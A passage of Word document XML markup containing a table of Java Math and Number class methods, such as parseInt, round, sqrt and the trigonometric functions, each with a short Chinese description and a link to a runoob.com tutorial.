                  <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                  <w:color w:val="006600"/>
                  <w:sz w:val="15"/>
                  <w:szCs w:val="15"/>
                </w:rPr>
                <w:t>toString()</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:br/>
              <w:t>以字符串形式返回值。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="4DCA6B3F" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="885" w:type="dxa"/>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1A3F2EAE"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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9040" w:type="dxa"/>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04EE8755"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hyperlink r:id="rId228" w:tgtFrame="https://www.runoob.com/java/_blank" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="a5"/>
                  <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                  <w:color w:val="006600"/>
                  <w:sz w:val="15"/>
                  <w:szCs w:val="15"/>
                </w:rPr>
                <w:t>parseInt()</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:br/>
              <w:t>将字符串解析为int类型。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="366A60C9" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="885" w:type="dxa"/>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69811F89"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7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9040" w:type="dxa"/>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19A3A7D5"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hyperlink r:id="rId229" w:tgtFrame="https://www.runoob.com/java/_blank" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="a5"/>
                  <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                  <w:color w:val="006600"/>
                  <w:sz w:val="15"/>
                  <w:szCs w:val="15"/>
                </w:rPr>
                <w:t>abs()</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:br/>
              <w:t>返回参数的绝对值。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="04ACA2EE" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="885" w:type="dxa"/>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2A0FC0A9"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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9040" w:type="dxa"/>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395ECB5E"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hyperlink r:id="rId230" w:tgtFrame="https://www.runoob.com/java/_blank" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="a5"/>
                  <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                  <w:color w:val="006600"/>
                  <w:sz w:val="15"/>
                  <w:szCs w:val="15"/>
                </w:rPr>
                <w:t>ceil()</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:br/>
              <w:t>返回大于等于( &gt;= )给定参数的的最小整数，类型为双精度浮点型。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="59CADDE5" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="885" w:type="dxa"/>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6DF32667"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9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9040" w:type="dxa"/>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24152220"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hyperlink r:id="rId231" w:tgtFrame="https://www.runoob.com/java/_blank" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="a5"/>
                  <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                  <w:color w:val="006600"/>
                  <w:sz w:val="15"/>
                  <w:szCs w:val="15"/>
                </w:rPr>
                <w:t>floor()</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:br/>
              <w:t>返回小于等于（&lt;=）给定参数的最大整数 。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="0C41D617" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="885" w:type="dxa"/>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56AF83D7"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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9040" w:type="dxa"/>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2661AD4B"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hyperlink r:id="rId232" w:tgtFrame="https://www.runoob.com/java/_blank" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="a5"/>
                  <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                  <w:color w:val="006600"/>
                  <w:sz w:val="15"/>
                  <w:szCs w:val="15"/>
                </w:rPr>
                <w:t>rint()</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:br/>
              <w:t>返回与参数最接近的整数。返回类型为double。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="08B965AC" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="885" w:type="dxa"/>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54BEDA8A"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11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9040" w:type="dxa"/>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38D2C417"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hyperlink r:id="rId233" w:tgtFrame="https://www.runoob.com/java/_blank" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="a5"/>
                  <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                  <w:color w:val="006600"/>
                  <w:sz w:val="15"/>
                  <w:szCs w:val="15"/>
                </w:rPr>
                <w:t>round()</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>它表示</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>四舍五入</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>，算法为 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:shd w:val="clear" w:color="auto" w:fill="ECEAE6"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>Math.floor(x+0.5)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>，即将原来的数字加上 0.5 后再向下取整，所以，Math.round(11.5) 的结果为12，Math.round(-11.5) 的结果为-11。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="5FA2E4CC" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="885" w:type="dxa"/>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4B7E3D9E"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lastRenderedPageBreak/>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9040" w:type="dxa"/>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450EB0D6"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hyperlink r:id="rId234" w:tgtFrame="https://www.runoob.com/java/_blank" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="a5"/>
                  <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                  <w:color w:val="006600"/>
                  <w:sz w:val="15"/>
                  <w:szCs w:val="15"/>
                </w:rPr>
                <w:t>min()</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:br/>
              <w:t>返回两个参数中的最小值。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="7D617672" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="885" w:type="dxa"/>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073044E6"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13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9040" w:type="dxa"/>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61CFD669"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hyperlink r:id="rId235" w:tgtFrame="https://www.runoob.com/java/_blank" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="a5"/>
                  <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                  <w:color w:val="006600"/>
                  <w:sz w:val="15"/>
                  <w:szCs w:val="15"/>
                </w:rPr>
                <w:t>max()</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:br/>
              <w:t>返回两个参数中的最大值。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="488A9C89" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="885" w:type="dxa"/>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1F0A00BB"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14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9040" w:type="dxa"/>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5DCACF96"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hyperlink r:id="rId236" w:tgtFrame="https://www.runoob.com/java/_blank" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="a5"/>
                  <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                  <w:color w:val="006600"/>
                  <w:sz w:val="15"/>
                  <w:szCs w:val="15"/>
                </w:rPr>
                <w:t>exp()</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:br/>
              <w:t>返回自然数底数e的参数次方。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="2707F1A5" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="885" w:type="dxa"/>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08A414F5"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15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9040" w:type="dxa"/>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19C49EAC"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hyperlink r:id="rId237" w:tgtFrame="https://www.runoob.com/java/_blank" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="a5"/>
                  <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                  <w:color w:val="006600"/>
                  <w:sz w:val="15"/>
                  <w:szCs w:val="15"/>
                </w:rPr>
                <w:t>log()</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:br/>
              <w:t>返回参数的自然数底数的对数值。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="6A68BB55" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="885" w:type="dxa"/>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76CE1384"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16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9040" w:type="dxa"/>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5ACFA138"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hyperlink r:id="rId238" w:tgtFrame="https://www.runoob.com/java/_blank" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="a5"/>
                  <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                  <w:color w:val="006600"/>
                  <w:sz w:val="15"/>
                  <w:szCs w:val="15"/>
                </w:rPr>
                <w:t>pow()</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:br/>
              <w:t>返回第一个参数的第二个参数次方。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="3ECB3BED" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="885" w:type="dxa"/>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4EE78B7D"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17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9040" w:type="dxa"/>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23DF0B8F"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hyperlink r:id="rId239" w:tgtFrame="https://www.runoob.com/java/_blank" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="a5"/>
                  <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                  <w:color w:val="006600"/>
                  <w:sz w:val="15"/>
                  <w:szCs w:val="15"/>
                </w:rPr>
                <w:t>sqrt()</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:br/>
              <w:t>求参数的算术平方根。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="51B80025" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="885" w:type="dxa"/>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15C6B7CF"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18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9040" w:type="dxa"/>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03864955"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hyperlink r:id="rId240" w:tgtFrame="https://www.runoob.com/java/_blank" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="a5"/>
                  <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                  <w:color w:val="006600"/>
                  <w:sz w:val="15"/>
                  <w:szCs w:val="15"/>
                </w:rPr>
                <w:t>sin()</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:br/>
              <w:t>求指定double类型参数的正弦值。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="7F623B93" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="885" w:type="dxa"/>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1AEA631C"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19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9040" w:type="dxa"/>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2CE8F094"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hyperlink r:id="rId241" w:tgtFrame="https://www.runoob.com/java/_blank" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="a5"/>
                  <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                  <w:color w:val="006600"/>
                  <w:sz w:val="15"/>
                  <w:szCs w:val="15"/>
                </w:rPr>
                <w:t>cos()</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:br/>
              <w:t>求指定double类型参数的余弦值。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="5619E452" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="885" w:type="dxa"/>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76946020"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20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9040" w:type="dxa"/>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353890DB"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hyperlink r:id="rId242" w:tgtFrame="https://www.runoob.com/java/_blank" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="a5"/>
                  <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                  <w:color w:val="006600"/>
                  <w:sz w:val="15"/>
                  <w:szCs w:val="15"/>
                </w:rPr>
                <w:t>tan()</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:br/>
              <w:t>求指定double类型参数的正切值。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="56585624" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="885" w:type="dxa"/>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3A58F18F"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21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9040" w:type="dxa"/>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0137D7A4"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hyperlink r:id="rId243" w:tgtFrame="https://www.runoob.com/java/_blank" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="a5"/>
                  <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                  <w:color w:val="006600"/>
                  <w:sz w:val="15"/>
                  <w:szCs w:val="15"/>
                </w:rPr>
                <w:t>asin()</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:br/>
              <w:t>求指定double类型参数的反正弦值。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="015E11DA" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="885" w:type="dxa"/>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15ED7953"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22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9040" w:type="dxa"/>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525426B7"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hyperlink r:id="rId244" w:tgtFrame="https://www.runoob.com/java/_blank" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="a5"/>
                  <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                  <w:color w:val="006600"/>
                  <w:sz w:val="15"/>
                  <w:szCs w:val="15"/>
                </w:rPr>
                <w:t>acos()</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:br/>
              <w:t>求指定double类型参数的反余弦值。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="07A36604" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="885" w:type="dxa"/>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10DF83BB"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23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9040" w:type="dxa"/>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69CD64DD"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hyperlink r:id="rId245" w:tgtFrame="https://www.runoob.com/java/_blank" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="a5"/>
                  <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                  <w:color w:val="006600"/>
                  <w:sz w:val="15"/>
                  <w:szCs w:val="15"/>
                </w:rPr>
                <w:t>atan()</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:br/>
              <w:t>求指定double类型参数的反正切值。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="38D82B3A" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="885" w:type="dxa"/>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228D5CA8"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24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9040" w:type="dxa"/>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24284B29"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hyperlink r:id="rId246" w:tgtFrame="https://www.runoob.com/java/_blank" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="a5"/>
                  <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                  <w:color w:val="006600"/>
                  <w:sz w:val="15"/>
                  <w:szCs w:val="15"/>
                </w:rPr>
                <w:t>atan2()</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>将笛卡尔坐标转换为极坐标，并返回极坐标的角度值。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="65F3EE30" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="885" w:type="dxa"/>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57FF26E9"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lastRenderedPageBreak/>
              <w:t>25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9040" w:type="dxa"/>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7284A67D"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hyperlink r:id="rId247" w:tgtFrame="https://www.runoob.com/java/_blank" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="a5"/>
                  <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                  <w:color w:val="006600"/>
                  <w:sz w:val="15"/>
                  <w:szCs w:val="15"/>
                </w:rPr>
                <w:t>toDegrees()</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:br/>
              <w:t>将参数转化为角度。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="7B06D357" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="885" w:type="dxa"/>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5A058D1D"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26</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9040" w:type="dxa"/>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22037E09"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hyperlink r:id="rId248" w:tgtFrame="https://www.runoob.com/java/_blank" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="a5"/>
                  <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                  <w:color w:val="006600"/>
                  <w:sz w:val="15"/>
                  <w:szCs w:val="15"/>
                </w:rPr>
                <w:t>toRadians()</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:lang w:bidi="ar"/>
